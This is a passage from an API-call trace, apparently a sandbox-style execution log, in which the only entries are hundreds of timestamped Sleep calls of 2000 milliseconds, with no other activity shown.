(dwMilliseconds=0x7d0) [0169.514] Sleep (dwMilliseconds=0x7d0) [0169.528] Sleep (dwMilliseconds=0x7d0) [0169.544] Sleep (dwMilliseconds=0x7d0) [0169.698] Sleep (dwMilliseconds=0x7d0) [0169.700] Sleep (dwMilliseconds=0x7d0) [0169.716] Sleep (dwMilliseconds=0x7d0) [0169.731] Sleep (dwMilliseconds=0x7d0) [0169.747] Sleep (dwMilliseconds=0x7d0) [0169.763] Sleep (dwMilliseconds=0x7d0) [0169.778] Sleep (dwMilliseconds=0x7d0) [0169.794] Sleep (dwMilliseconds=0x7d0) [0169.809] Sleep (dwMilliseconds=0x7d0) [0169.825] Sleep (dwMilliseconds=0x7d0) [0169.841] Sleep (dwMilliseconds=0x7d0) [0169.982] Sleep (dwMilliseconds=0x7d0) [0169.997] Sleep (dwMilliseconds=0x7d0) [0170.012] Sleep (dwMilliseconds=0x7d0) [0170.033] Sleep (dwMilliseconds=0x7d0) [0170.060] Sleep (dwMilliseconds=0x7d0) [0170.074] Sleep (dwMilliseconds=0x7d0) [0170.091] Sleep (dwMilliseconds=0x7d0) [0170.106] Sleep (dwMilliseconds=0x7d0) [0170.121] Sleep (dwMilliseconds=0x7d0) [0170.137] Sleep (dwMilliseconds=0x7d0) [0170.153] Sleep (dwMilliseconds=0x7d0) [0170.168] Sleep (dwMilliseconds=0x7d0) [0170.184] Sleep (dwMilliseconds=0x7d0) [0170.200] Sleep (dwMilliseconds=0x7d0) [0170.215] Sleep (dwMilliseconds=0x7d0) [0170.230] Sleep (dwMilliseconds=0x7d0) [0170.246] Sleep (dwMilliseconds=0x7d0) [0170.268] Sleep (dwMilliseconds=0x7d0) [0170.278] Sleep (dwMilliseconds=0x7d0) [0170.293] Sleep (dwMilliseconds=0x7d0) [0170.310] Sleep (dwMilliseconds=0x7d0) [0170.324] Sleep (dwMilliseconds=0x7d0) [0170.340] Sleep (dwMilliseconds=0x7d0) [0170.357] Sleep (dwMilliseconds=0x7d0) [0170.371] Sleep (dwMilliseconds=0x7d0) [0170.387] Sleep (dwMilliseconds=0x7d0) [0170.402] Sleep (dwMilliseconds=0x7d0) [0170.419] Sleep (dwMilliseconds=0x7d0) [0170.434] Sleep (dwMilliseconds=0x7d0) [0170.449] Sleep (dwMilliseconds=0x7d0) [0170.465] Sleep (dwMilliseconds=0x7d0) [0170.480] Sleep (dwMilliseconds=0x7d0) [0170.496] Sleep (dwMilliseconds=0x7d0) [0170.512] Sleep (dwMilliseconds=0x7d0) [0170.528] Sleep (dwMilliseconds=0x7d0) [0170.543] Sleep (dwMilliseconds=0x7d0) [0170.562] Sleep (dwMilliseconds=0x7d0) [0170.613] Sleep (dwMilliseconds=0x7d0) [0170.621] Sleep (dwMilliseconds=0x7d0) [0170.638] Sleep (dwMilliseconds=0x7d0) [0170.652] Sleep (dwMilliseconds=0x7d0) [0170.667] Sleep (dwMilliseconds=0x7d0) [0170.683] Sleep (dwMilliseconds=0x7d0) [0170.699] Sleep (dwMilliseconds=0x7d0) [0170.714] Sleep (dwMilliseconds=0x7d0) [0170.730] Sleep (dwMilliseconds=0x7d0) [0170.746] Sleep (dwMilliseconds=0x7d0) [0170.761] Sleep (dwMilliseconds=0x7d0) [0170.777] Sleep (dwMilliseconds=0x7d0) [0170.794] Sleep (dwMilliseconds=0x7d0) [0170.808] Sleep (dwMilliseconds=0x7d0) [0172.851] Sleep (dwMilliseconds=0x7d0) [0172.867] Sleep (dwMilliseconds=0x7d0) [0172.883] Sleep (dwMilliseconds=0x7d0) [0172.899] Sleep (dwMilliseconds=0x7d0) [0172.914] Sleep (dwMilliseconds=0x7d0) [0172.931] Sleep (dwMilliseconds=0x7d0) [0172.945] Sleep (dwMilliseconds=0x7d0) [0172.961] Sleep (dwMilliseconds=0x7d0) [0172.976] Sleep (dwMilliseconds=0x7d0) [0173.007] Sleep (dwMilliseconds=0x7d0) [0173.007] Sleep (dwMilliseconds=0x7d0) [0173.023] Sleep (dwMilliseconds=0x7d0) [0173.040] Sleep (dwMilliseconds=0x7d0) [0173.054] Sleep (dwMilliseconds=0x7d0) [0173.070] Sleep (dwMilliseconds=0x7d0) [0173.085] Sleep (dwMilliseconds=0x7d0) [0173.117] Sleep (dwMilliseconds=0x7d0) [0173.142] Sleep (dwMilliseconds=0x7d0) [0173.148] Sleep (dwMilliseconds=0x7d0) [0173.164] Sleep (dwMilliseconds=0x7d0) [0173.179] Sleep (dwMilliseconds=0x7d0) [0173.195] Sleep (dwMilliseconds=0x7d0) [0173.210] Sleep (dwMilliseconds=0x7d0) [0173.226] Sleep (dwMilliseconds=0x7d0) [0173.244] Sleep (dwMilliseconds=0x7d0) [0173.257] Sleep (dwMilliseconds=0x7d0) [0173.279] Sleep (dwMilliseconds=0x7d0) [0173.288] Sleep (dwMilliseconds=0x7d0) [0173.304] Sleep (dwMilliseconds=0x7d0) [0173.320] Sleep (dwMilliseconds=0x7d0) [0173.335] Sleep (dwMilliseconds=0x7d0) [0173.352] Sleep (dwMilliseconds=0x7d0) [0173.366] Sleep (dwMilliseconds=0x7d0) [0173.382] Sleep (dwMilliseconds=0x7d0) [0173.398] Sleep (dwMilliseconds=0x7d0) [0173.413] Sleep (dwMilliseconds=0x7d0) [0173.429] Sleep (dwMilliseconds=0x7d0) [0173.444] Sleep (dwMilliseconds=0x7d0) [0173.461] Sleep (dwMilliseconds=0x7d0) [0173.476] Sleep (dwMilliseconds=0x7d0) [0173.491] Sleep (dwMilliseconds=0x7d0) [0173.507] Sleep (dwMilliseconds=0x7d0) [0173.522] Sleep (dwMilliseconds=0x7d0) [0173.538] Sleep (dwMilliseconds=0x7d0) [0173.554] Sleep (dwMilliseconds=0x7d0) [0173.571] Sleep (dwMilliseconds=0x7d0) [0173.585] Sleep (dwMilliseconds=0x7d0) [0173.600] Sleep (dwMilliseconds=0x7d0) [0173.616] Sleep (dwMilliseconds=0x7d0) [0173.632] Sleep (dwMilliseconds=0x7d0) [0173.647] Sleep (dwMilliseconds=0x7d0) [0173.663] Sleep (dwMilliseconds=0x7d0) [0173.680] Sleep (dwMilliseconds=0x7d0) [0173.694] Sleep (dwMilliseconds=0x7d0) [0173.710] Sleep (dwMilliseconds=0x7d0) [0173.725] Sleep (dwMilliseconds=0x7d0) [0173.741] Sleep (dwMilliseconds=0x7d0) [0173.757] Sleep (dwMilliseconds=0x7d0) [0173.772] Sleep (dwMilliseconds=0x7d0) [0173.789] Sleep (dwMilliseconds=0x7d0) [0173.811] Sleep (dwMilliseconds=0x7d0) [0173.819] Sleep (dwMilliseconds=0x7d0) [0173.834] Sleep (dwMilliseconds=0x7d0) [0173.861] Sleep (dwMilliseconds=0x7d0) [0173.865] Sleep (dwMilliseconds=0x7d0) [0173.881] Sleep (dwMilliseconds=0x7d0) [0173.899] Sleep (dwMilliseconds=0x7d0) [0173.912] Sleep (dwMilliseconds=0x7d0) [0173.928] Sleep (dwMilliseconds=0x7d0) [0173.944] Sleep (dwMilliseconds=0x7d0) [0173.959] Sleep (dwMilliseconds=0x7d0) [0173.975] Sleep (dwMilliseconds=0x7d0) [0173.991] Sleep (dwMilliseconds=0x7d0) [0174.015] Sleep (dwMilliseconds=0x7d0) [0174.022] Sleep (dwMilliseconds=0x7d0) [0174.037] Sleep (dwMilliseconds=0x7d0) [0174.053] Sleep (dwMilliseconds=0x7d0) [0174.069] Sleep (dwMilliseconds=0x7d0) [0174.084] Sleep (dwMilliseconds=0x7d0) [0174.124] Sleep (dwMilliseconds=0x7d0) [0174.131] Sleep (dwMilliseconds=0x7d0) [0174.149] Sleep (dwMilliseconds=0x7d0) [0174.162] Sleep (dwMilliseconds=0x7d0) [0174.178] Sleep (dwMilliseconds=0x7d0) [0174.193] Sleep (dwMilliseconds=0x7d0) [0174.210] Sleep (dwMilliseconds=0x7d0) [0174.225] Sleep (dwMilliseconds=0x7d0) [0174.240] Sleep (dwMilliseconds=0x7d0) [0174.255] Sleep (dwMilliseconds=0x7d0) [0174.271] Sleep (dwMilliseconds=0x7d0) [0174.288] Sleep (dwMilliseconds=0x7d0) [0174.303] Sleep (dwMilliseconds=0x7d0) [0174.318] Sleep (dwMilliseconds=0x7d0) [0174.339] Sleep (dwMilliseconds=0x7d0) [0174.349] Sleep (dwMilliseconds=0x7d0) [0174.365] Sleep (dwMilliseconds=0x7d0) [0174.380] Sleep (dwMilliseconds=0x7d0) [0174.399] Sleep (dwMilliseconds=0x7d0) [0174.412] Sleep (dwMilliseconds=0x7d0) [0174.427] Sleep (dwMilliseconds=0x7d0) [0174.444] Sleep (dwMilliseconds=0x7d0) [0174.458] Sleep (dwMilliseconds=0x7d0) [0174.474] Sleep (dwMilliseconds=0x7d0) [0174.490] Sleep (dwMilliseconds=0x7d0) [0174.506] Sleep (dwMilliseconds=0x7d0) [0174.521] Sleep (dwMilliseconds=0x7d0) [0174.536] Sleep (dwMilliseconds=0x7d0) [0174.553] Sleep (dwMilliseconds=0x7d0) [0174.568] Sleep (dwMilliseconds=0x7d0) [0174.583] Sleep (dwMilliseconds=0x7d0) [0174.625] Sleep (dwMilliseconds=0x7d0) [0174.630] Sleep (dwMilliseconds=0x7d0) [0174.646] Sleep (dwMilliseconds=0x7d0) [0174.662] Sleep (dwMilliseconds=0x7d0) [0174.677] Sleep (dwMilliseconds=0x7d0) [0174.692] Sleep (dwMilliseconds=0x7d0) [0174.708] Sleep (dwMilliseconds=0x7d0) [0174.723] Sleep (dwMilliseconds=0x7d0) [0174.739] Sleep (dwMilliseconds=0x7d0) [0174.755] Sleep (dwMilliseconds=0x7d0) [0174.784] Sleep (dwMilliseconds=0x7d0) [0174.788] Sleep (dwMilliseconds=0x7d0) [0174.802] Sleep (dwMilliseconds=0x7d0) [0174.817] Sleep (dwMilliseconds=0x7d0) [0174.833] Sleep (dwMilliseconds=0x7d0) [0174.848] Sleep (dwMilliseconds=0x7d0) [0174.915] Sleep (dwMilliseconds=0x7d0) [0174.960] Sleep (dwMilliseconds=0x7d0) [0174.978] Sleep (dwMilliseconds=0x7d0) [0174.990] Sleep (dwMilliseconds=0x7d0) [0175.006] Sleep (dwMilliseconds=0x7d0) [0175.024] Sleep (dwMilliseconds=0x7d0) [0175.037] Sleep (dwMilliseconds=0x7d0) [0175.055] Sleep (dwMilliseconds=0x7d0) [0175.068] Sleep (dwMilliseconds=0x7d0) [0175.083] Sleep (dwMilliseconds=0x7d0) [0175.128] Sleep (dwMilliseconds=0x7d0) [0175.129] Sleep (dwMilliseconds=0x7d0) [0175.145] Sleep (dwMilliseconds=0x7d0) [0175.160] Sleep (dwMilliseconds=0x7d0) [0175.182] Sleep (dwMilliseconds=0x7d0) [0175.191] Sleep (dwMilliseconds=0x7d0) [0175.207] Sleep (dwMilliseconds=0x7d0) [0175.224] Sleep (dwMilliseconds=0x7d0) [0175.238] Sleep (dwMilliseconds=0x7d0) [0175.258] Sleep (dwMilliseconds=0x7d0) [0175.269] Sleep (dwMilliseconds=0x7d0) [0175.287] Sleep (dwMilliseconds=0x7d0) [0175.301] Sleep (dwMilliseconds=0x7d0) [0175.322] Sleep (dwMilliseconds=0x7d0) [0175.333] Sleep (dwMilliseconds=0x7d0) [0175.348] Sleep (dwMilliseconds=0x7d0) [0175.363] Sleep (dwMilliseconds=0x7d0) [0175.384] Sleep (dwMilliseconds=0x7d0) [0175.400] Sleep (dwMilliseconds=0x7d0) [0175.410] Sleep (dwMilliseconds=0x7d0) [0175.426] Sleep (dwMilliseconds=0x7d0) [0175.442] Sleep (dwMilliseconds=0x7d0) [0175.461] Sleep (dwMilliseconds=0x7d0) [0175.472] Sleep (dwMilliseconds=0x7d0) [0175.488] Sleep (dwMilliseconds=0x7d0) [0175.504] Sleep (dwMilliseconds=0x7d0) [0175.525] Sleep (dwMilliseconds=0x7d0) [0175.535] Sleep (dwMilliseconds=0x7d0) [0175.552] Sleep (dwMilliseconds=0x7d0) [0175.566] Sleep (dwMilliseconds=0x7d0) [0175.581] Sleep (dwMilliseconds=0x7d0) [0175.602] Sleep (dwMilliseconds=0x7d0) [0175.613] Sleep (dwMilliseconds=0x7d0) [0175.629] Sleep (dwMilliseconds=0x7d0) [0175.644] Sleep (dwMilliseconds=0x7d0) [0175.668] Sleep (dwMilliseconds=0x7d0) [0175.675] Sleep (dwMilliseconds=0x7d0) [0175.691] Sleep (dwMilliseconds=0x7d0) [0175.706] Sleep (dwMilliseconds=0x7d0) [0175.728] Sleep (dwMilliseconds=0x7d0) [0175.738] Sleep (dwMilliseconds=0x7d0) [0175.753] Sleep (dwMilliseconds=0x7d0) [0175.770] Sleep (dwMilliseconds=0x7d0) [0175.784] Sleep (dwMilliseconds=0x7d0) [0175.804] Sleep (dwMilliseconds=0x7d0) [0175.816] Sleep (dwMilliseconds=0x7d0) [0175.834] Sleep (dwMilliseconds=0x7d0) [0175.847] Sleep (dwMilliseconds=0x7d0) [0175.867] Sleep (dwMilliseconds=0x7d0) [0175.896] Sleep (dwMilliseconds=0x7d0) [0175.911] Sleep (dwMilliseconds=0x7d0) [0175.942] Sleep (dwMilliseconds=0x7d0) [0175.957] Sleep (dwMilliseconds=0x7d0) [0175.973] Sleep (dwMilliseconds=0x7d0) [0175.989] Sleep (dwMilliseconds=0x7d0) [0176.015] Sleep (dwMilliseconds=0x7d0) [0176.020] Sleep (dwMilliseconds=0x7d0) [0176.035] Sleep (dwMilliseconds=0x7d0) [0176.051] Sleep (dwMilliseconds=0x7d0) [0176.070] Sleep (dwMilliseconds=0x7d0) [0176.082] Sleep (dwMilliseconds=0x7d0) [0176.116] Sleep (dwMilliseconds=0x7d0) [0176.135] Sleep (dwMilliseconds=0x7d0) [0176.144] Sleep (dwMilliseconds=0x7d0) [0176.160] Sleep (dwMilliseconds=0x7d0) [0176.175] Sleep (dwMilliseconds=0x7d0) [0176.191] Sleep (dwMilliseconds=0x7d0) [0176.211] Sleep (dwMilliseconds=0x7d0) [0176.223] Sleep (dwMilliseconds=0x7d0) [0176.237] Sleep (dwMilliseconds=0x7d0) [0176.252] Sleep (dwMilliseconds=0x7d0) [0176.273] Sleep (dwMilliseconds=0x7d0) [0176.284] Sleep (dwMilliseconds=0x7d0) [0176.299] Sleep (dwMilliseconds=0x7d0) [0176.315] Sleep (dwMilliseconds=0x7d0) [0176.337] Sleep (dwMilliseconds=0x7d0) [0176.347] Sleep (dwMilliseconds=0x7d0) [0176.362] Sleep (dwMilliseconds=0x7d0) [0176.377] Sleep (dwMilliseconds=0x7d0) [0176.393] Sleep (dwMilliseconds=0x7d0) [0176.415] Sleep (dwMilliseconds=0x7d0) [0176.424] Sleep (dwMilliseconds=0x7d0) [0176.441] Sleep (dwMilliseconds=0x7d0) [0176.460] Sleep (dwMilliseconds=0x7d0) [0176.471] Sleep (dwMilliseconds=0x7d0) [0176.486] Sleep (dwMilliseconds=0x7d0) [0176.503] Sleep (dwMilliseconds=0x7d0) [0176.522] Sleep (dwMilliseconds=0x7d0) [0176.533] Sleep (dwMilliseconds=0x7d0) [0176.550] Sleep (dwMilliseconds=0x7d0) [0176.564] Sleep (dwMilliseconds=0x7d0) [0176.585] Sleep (dwMilliseconds=0x7d0) [0176.596] Sleep (dwMilliseconds=0x7d0) [0176.611] Sleep (dwMilliseconds=0x7d0) [0176.627] Sleep (dwMilliseconds=0x7d0) [0176.643] Sleep (dwMilliseconds=0x7d0) [0176.663] Sleep (dwMilliseconds=0x7d0) [0176.674] Sleep (dwMilliseconds=0x7d0) [0176.689] Sleep (dwMilliseconds=0x7d0) [0176.705] Sleep (dwMilliseconds=0x7d0) [0176.726] Sleep (dwMilliseconds=0x7d0) [0176.736] Sleep (dwMilliseconds=0x7d0) [0176.752] Sleep (dwMilliseconds=0x7d0) [0176.768] Sleep (dwMilliseconds=0x7d0) [0176.783] Sleep (dwMilliseconds=0x7d0) [0176.807] Sleep (dwMilliseconds=0x7d0) [0176.814] Sleep (dwMilliseconds=0x7d0) [0176.830] Sleep (dwMilliseconds=0x7d0) [0176.847] Sleep (dwMilliseconds=0x7d0) [0176.868] Sleep (dwMilliseconds=0x7d0) [0176.886] Sleep (dwMilliseconds=0x7d0) [0176.892] Sleep (dwMilliseconds=0x7d0) [0176.910] Sleep (dwMilliseconds=0x7d0) [0176.923] Sleep (dwMilliseconds=0x7d0) [0176.939] Sleep (dwMilliseconds=0x7d0) [0176.959] Sleep (dwMilliseconds=0x7d0) [0176.971] Sleep (dwMilliseconds=0x7d0) [0176.990] Sleep (dwMilliseconds=0x7d0) [0177.001] Sleep (dwMilliseconds=0x7d0) [0177.034] Sleep (dwMilliseconds=0x7d0) [0177.052] Sleep (dwMilliseconds=0x7d0) [0177.063] Sleep (dwMilliseconds=0x7d0) [0177.080] Sleep (dwMilliseconds=0x7d0) [0177.118] Sleep (dwMilliseconds=0x7d0) [0177.126] Sleep (dwMilliseconds=0x7d0) [0177.141] Sleep (dwMilliseconds=0x7d0) [0177.158] Sleep (dwMilliseconds=0x7d0) [0177.178] Sleep (dwMilliseconds=0x7d0) [0177.190] Sleep (dwMilliseconds=0x7d0) [0177.204] Sleep (dwMilliseconds=0x7d0) [0177.220] Sleep (dwMilliseconds=0x7d0) [0177.235] Sleep (dwMilliseconds=0x7d0) [0177.255] Sleep (dwMilliseconds=0x7d0) [0177.266] Sleep (dwMilliseconds=0x7d0) [0177.282] Sleep (dwMilliseconds=0x7d0) [0177.299] Sleep (dwMilliseconds=0x7d0) [0177.320] Sleep (dwMilliseconds=0x7d0) [0177.329] Sleep (dwMilliseconds=0x7d0) [0177.344] Sleep (dwMilliseconds=0x7d0) [0177.360] Sleep (dwMilliseconds=0x7d0) [0177.382] Sleep (dwMilliseconds=0x7d0) [0177.392] Sleep (dwMilliseconds=0x7d0) [0177.409] Sleep (dwMilliseconds=0x7d0) [0177.422] Sleep (dwMilliseconds=0x7d0) [0177.438] Sleep (dwMilliseconds=0x7d0) [0177.465] Sleep (dwMilliseconds=0x7d0) [0177.475] Sleep (dwMilliseconds=0x7d0) [0177.485] Sleep (dwMilliseconds=0x7d0) [0177.504] Sleep (dwMilliseconds=0x7d0) [0177.523] Sleep (dwMilliseconds=0x7d0) [0177.532] Sleep (dwMilliseconds=0x7d0) [0177.547] Sleep (dwMilliseconds=0x7d0) [0177.563] Sleep (dwMilliseconds=0x7d0) [0177.584] Sleep (dwMilliseconds=0x7d0) [0177.594] Sleep (dwMilliseconds=0x7d0) [0177.610] Sleep (dwMilliseconds=0x7d0) [0177.626] Sleep (dwMilliseconds=0x7d0) [0177.641] Sleep (dwMilliseconds=0x7d0) [0177.662] Sleep (dwMilliseconds=0x7d0) [0177.672] Sleep (dwMilliseconds=0x7d0) [0177.688] Sleep (dwMilliseconds=0x7d0) [0177.703] Sleep (dwMilliseconds=0x7d0) [0177.723] Sleep (dwMilliseconds=0x7d0) [0177.735] Sleep (dwMilliseconds=0x7d0) [0177.750] Sleep (dwMilliseconds=0x7d0) [0177.765] Sleep (dwMilliseconds=0x7d0) [0177.781] Sleep (dwMilliseconds=0x7d0) [0177.801] Sleep (dwMilliseconds=0x7d0) [0177.812] Sleep (dwMilliseconds=0x7d0) [0177.828] Sleep (dwMilliseconds=0x7d0) [0177.845] Sleep (dwMilliseconds=0x7d0) [0177.865] Sleep (dwMilliseconds=0x7d0) [0177.875] Sleep (dwMilliseconds=0x7d0) [0177.900] Sleep (dwMilliseconds=0x7d0) [0177.906] Sleep (dwMilliseconds=0x7d0) [0177.922] Sleep (dwMilliseconds=0x7d0) [0177.937] Sleep (dwMilliseconds=0x7d0) [0177.958] Sleep (dwMilliseconds=0x7d0) [0177.968] Sleep (dwMilliseconds=0x7d0) [0177.984] Sleep (dwMilliseconds=0x7d0) [0178.000] Sleep (dwMilliseconds=0x7d0) [0178.032] Sleep (dwMilliseconds=0x7d0) [0178.051] Sleep (dwMilliseconds=0x7d0) [0178.063] Sleep (dwMilliseconds=0x7d0) [0178.077] Sleep (dwMilliseconds=0x7d0) [0178.093] Sleep (dwMilliseconds=0x7d0) [0178.144] Sleep (dwMilliseconds=0x7d0) [0178.155] Sleep (dwMilliseconds=0x7d0) [0178.173] Sleep (dwMilliseconds=0x7d0) [0178.188] Sleep (dwMilliseconds=0x7d0) [0178.211] Sleep (dwMilliseconds=0x7d0) [0178.218] Sleep (dwMilliseconds=0x7d0) [0178.234] Sleep (dwMilliseconds=0x7d0) [0178.250] Sleep (dwMilliseconds=0x7d0) [0178.268] Sleep (dwMilliseconds=0x7d0) [0178.283] Sleep (dwMilliseconds=0x7d0) [0178.296] Sleep (dwMilliseconds=0x7d0) [0178.312] Sleep (dwMilliseconds=0x7d0) [0178.334] Sleep (dwMilliseconds=0x7d0) [0178.343] Sleep (dwMilliseconds=0x7d0) [0178.358] Sleep (dwMilliseconds=0x7d0) [0178.374] Sleep (dwMilliseconds=0x7d0) [0178.392] Sleep (dwMilliseconds=0x7d0) [0178.410] Sleep (dwMilliseconds=0x7d0) [0178.421] Sleep (dwMilliseconds=0x7d0) [0178.437] Sleep (dwMilliseconds=0x7d0) [0178.454] Sleep (dwMilliseconds=0x7d0) [0178.472] Sleep (dwMilliseconds=0x7d0) [0178.483] Sleep (dwMilliseconds=0x7d0) [0178.500] Sleep (dwMilliseconds=0x7d0) [0178.514] Sleep (dwMilliseconds=0x7d0) [0178.534] Sleep (dwMilliseconds=0x7d0) [0178.546] Sleep (dwMilliseconds=0x7d0) [0178.561] Sleep (dwMilliseconds=0x7d0) [0178.583] Sleep (dwMilliseconds=0x7d0) [0178.592] Sleep (dwMilliseconds=0x7d0) [0178.609] Sleep (dwMilliseconds=0x7d0) [0178.624] Sleep (dwMilliseconds=0x7d0) [0178.639] Sleep (dwMilliseconds=0x7d0) [0178.659] Sleep (dwMilliseconds=0x7d0) [0178.670] Sleep (dwMilliseconds=0x7d0) [0178.686] Sleep (dwMilliseconds=0x7d0) [0178.702] Sleep (dwMilliseconds=0x7d0) [0178.723] Sleep (dwMilliseconds=0x7d0) [0178.733] Sleep (dwMilliseconds=0x7d0) [0178.748] Sleep (dwMilliseconds=0x7d0) [0178.764] Sleep (dwMilliseconds=0x7d0) [0178.792] Sleep (dwMilliseconds=0x7d0) [0178.795] Sleep (dwMilliseconds=0x7d0) [0178.811] Sleep (dwMilliseconds=0x7d0) [0178.827] Sleep (dwMilliseconds=0x7d0) [0178.842] Sleep (dwMilliseconds=0x7d0) [0178.865] Sleep (dwMilliseconds=0x7d0) [0178.873] Sleep (dwMilliseconds=0x7d0) [0178.889] Sleep (dwMilliseconds=0x7d0) [0178.918] Sleep (dwMilliseconds=0x7d0) [0178.921] Sleep (dwMilliseconds=0x7d0) [0178.937] Sleep (dwMilliseconds=0x7d0) [0178.959] Sleep (dwMilliseconds=0x7d0) [0178.967] Sleep (dwMilliseconds=0x7d0) [0178.982] Sleep (dwMilliseconds=0x7d0) [0178.998] Sleep (dwMilliseconds=0x7d0) [0179.031] Sleep (dwMilliseconds=0x7d0) [0179.046] Sleep (dwMilliseconds=0x7d0) [0179.061] Sleep (dwMilliseconds=0x7d0) [0179.076] Sleep (dwMilliseconds=0x7d0) [0179.092] Sleep (dwMilliseconds=0x7d0) [0179.133] Sleep (dwMilliseconds=0x7d0) [0179.138] Sleep (dwMilliseconds=0x7d0) [0179.155] Sleep (dwMilliseconds=0x7d0) [0179.169] Sleep (dwMilliseconds=0x7d0) [0179.185] Sleep (dwMilliseconds=0x7d0) [0179.205] Sleep (dwMilliseconds=0x7d0) [0179.216] Sleep (dwMilliseconds=0x7d0) [0179.232] Sleep (dwMilliseconds=0x7d0) [0179.248] Sleep (dwMilliseconds=0x7d0) [0179.272] Sleep (dwMilliseconds=0x7d0) [0179.279] Sleep (dwMilliseconds=0x7d0) [0179.294] Sleep (dwMilliseconds=0x7d0) [0179.310] Sleep (dwMilliseconds=0x7d0) [0179.331] Sleep (dwMilliseconds=0x7d0) [0179.341] Sleep (dwMilliseconds=0x7d0) [0179.357] Sleep (dwMilliseconds=0x7d0) [0179.373] Sleep (dwMilliseconds=0x7d0) [0179.388] Sleep (dwMilliseconds=0x7d0) [0179.409] Sleep (dwMilliseconds=0x7d0) [0179.419] Sleep (dwMilliseconds=0x7d0) [0179.437] Sleep (dwMilliseconds=0x7d0) [0179.450] Sleep (dwMilliseconds=0x7d0) [0179.473] Sleep (dwMilliseconds=0x7d0) [0179.482] Sleep (dwMilliseconds=0x7d0) [0179.502] Sleep (dwMilliseconds=0x7d0) [0179.513] Sleep (dwMilliseconds=0x7d0) [0179.535] Sleep (dwMilliseconds=0x7d0) [0179.544] Sleep (dwMilliseconds=0x7d0) [0179.560] Sleep (dwMilliseconds=0x7d0) [0179.576] Sleep (dwMilliseconds=0x7d0) [0179.591] Sleep (dwMilliseconds=0x7d0) [0179.611] Sleep (dwMilliseconds=0x7d0) [0179.666] Sleep (dwMilliseconds=0x7d0) [0179.669] Sleep (dwMilliseconds=0x7d0) [0179.685] Sleep (dwMilliseconds=0x7d0) [0179.700] Sleep (dwMilliseconds=0x7d0) [0179.722] Sleep (dwMilliseconds=0x7d0) [0179.731] Sleep (dwMilliseconds=0x7d0) [0179.747] Sleep (dwMilliseconds=0x7d0) [0179.762] Sleep (dwMilliseconds=0x7d0) [0179.782] Sleep (dwMilliseconds=0x7d0) [0179.795] Sleep (dwMilliseconds=0x7d0) [0179.809] Sleep (dwMilliseconds=0x7d0) [0179.825] Sleep (dwMilliseconds=0x7d0) [0179.840] Sleep (dwMilliseconds=0x7d0) [0179.861] Sleep (dwMilliseconds=0x7d0) [0179.872] Sleep (dwMilliseconds=0x7d0) [0179.887] Sleep (dwMilliseconds=0x7d0) [0179.904] Sleep (dwMilliseconds=0x7d0) [0179.928] Sleep (dwMilliseconds=0x7d0) [0179.934] Sleep (dwMilliseconds=0x7d0) [0179.949] Sleep (dwMilliseconds=0x7d0) [0179.965] Sleep (dwMilliseconds=0x7d0) [0179.981] Sleep (dwMilliseconds=0x7d0) [0179.997] Sleep (dwMilliseconds=0x7d0) [0180.013] Sleep (dwMilliseconds=0x7d0) [0180.038] Sleep (dwMilliseconds=0x7d0) [0180.043] Sleep (dwMilliseconds=0x7d0) [0180.059] Sleep (dwMilliseconds=0x7d0) [0180.074] Sleep (dwMilliseconds=0x7d0) [0180.090] Sleep (dwMilliseconds=0x7d0) [0180.124] Sleep (dwMilliseconds=0x7d0) [0180.137] Sleep (dwMilliseconds=0x7d0) [0180.152] Sleep (dwMilliseconds=0x7d0) [0180.168] Sleep (dwMilliseconds=0x7d0) [0180.189] Sleep (dwMilliseconds=0x7d0) [0180.199] Sleep (dwMilliseconds=0x7d0) [0180.215] Sleep (dwMilliseconds=0x7d0) [0180.232] Sleep (dwMilliseconds=0x7d0) [0180.246] Sleep (dwMilliseconds=0x7d0) [0180.261] Sleep (dwMilliseconds=0x7d0) [0180.278] Sleep (dwMilliseconds=0x7d0) [0180.293] Sleep (dwMilliseconds=0x7d0) [0180.308] Sleep (dwMilliseconds=0x7d0) [0180.324] Sleep (dwMilliseconds=0x7d0) [0180.341] Sleep (dwMilliseconds=0x7d0) [0180.356] Sleep (dwMilliseconds=0x7d0) [0180.371] Sleep (dwMilliseconds=0x7d0) [0180.389] Sleep (dwMilliseconds=0x7d0) [0180.402] Sleep (dwMilliseconds=0x7d0) [0180.418] Sleep (dwMilliseconds=0x7d0) [0180.433] Sleep (dwMilliseconds=0x7d0) [0180.450] Sleep (dwMilliseconds=0x7d0) [0180.464] Sleep (dwMilliseconds=0x7d0) [0180.481] Sleep (dwMilliseconds=0x7d0) [0180.496] Sleep (dwMilliseconds=0x7d0) [0180.511] Sleep (dwMilliseconds=0x7d0) [0180.527] Sleep (dwMilliseconds=0x7d0) [0180.542] Sleep (dwMilliseconds=0x7d0) [0180.559] Sleep (dwMilliseconds=0x7d0) [0180.575] Sleep (dwMilliseconds=0x7d0) [0180.589] Sleep (dwMilliseconds=0x7d0) [0180.605] Sleep (dwMilliseconds=0x7d0) [0180.621] Sleep (dwMilliseconds=0x7d0) [0180.636] Sleep (dwMilliseconds=0x7d0) [0180.652] Sleep (dwMilliseconds=0x7d0) [0180.668] Sleep (dwMilliseconds=0x7d0) [0180.683] Sleep (dwMilliseconds=0x7d0) [0180.698] Sleep (dwMilliseconds=0x7d0) [0180.722] Sleep (dwMilliseconds=0x7d0) [0180.729] Sleep (dwMilliseconds=0x7d0) [0180.745] Sleep (dwMilliseconds=0x7d0) [0180.761] Sleep (dwMilliseconds=0x7d0) [0180.778] Sleep (dwMilliseconds=0x7d0) [0180.792] Sleep (dwMilliseconds=0x7d0) [0180.808] Sleep (dwMilliseconds=0x7d0) [0180.823] Sleep (dwMilliseconds=0x7d0) [0180.839] Sleep (dwMilliseconds=0x7d0) [0180.854] Sleep (dwMilliseconds=0x7d0) [0180.870] Sleep (dwMilliseconds=0x7d0) [0180.887] Sleep (dwMilliseconds=0x7d0) [0180.918] Sleep (dwMilliseconds=0x7d0) [0180.942] Sleep (dwMilliseconds=0x7d0) [0180.948] Sleep (dwMilliseconds=0x7d0) [0180.963] Sleep (dwMilliseconds=0x7d0) [0180.979] Sleep (dwMilliseconds=0x7d0) [0180.996] Sleep (dwMilliseconds=0x7d0) [0181.010] Sleep (dwMilliseconds=0x7d0) [0181.026] Sleep (dwMilliseconds=0x7d0) [0181.052] Sleep (dwMilliseconds=0x7d0) [0181.057] Sleep (dwMilliseconds=0x7d0) [0181.073] Sleep (dwMilliseconds=0x7d0) [0181.088] Sleep (dwMilliseconds=0x7d0) [0181.124] Sleep (dwMilliseconds=0x7d0) [0181.136] Sleep (dwMilliseconds=0x7d0) [0181.151] Sleep (dwMilliseconds=0x7d0) [0181.166] Sleep (dwMilliseconds=0x7d0) [0181.182] Sleep (dwMilliseconds=0x7d0) [0181.197] 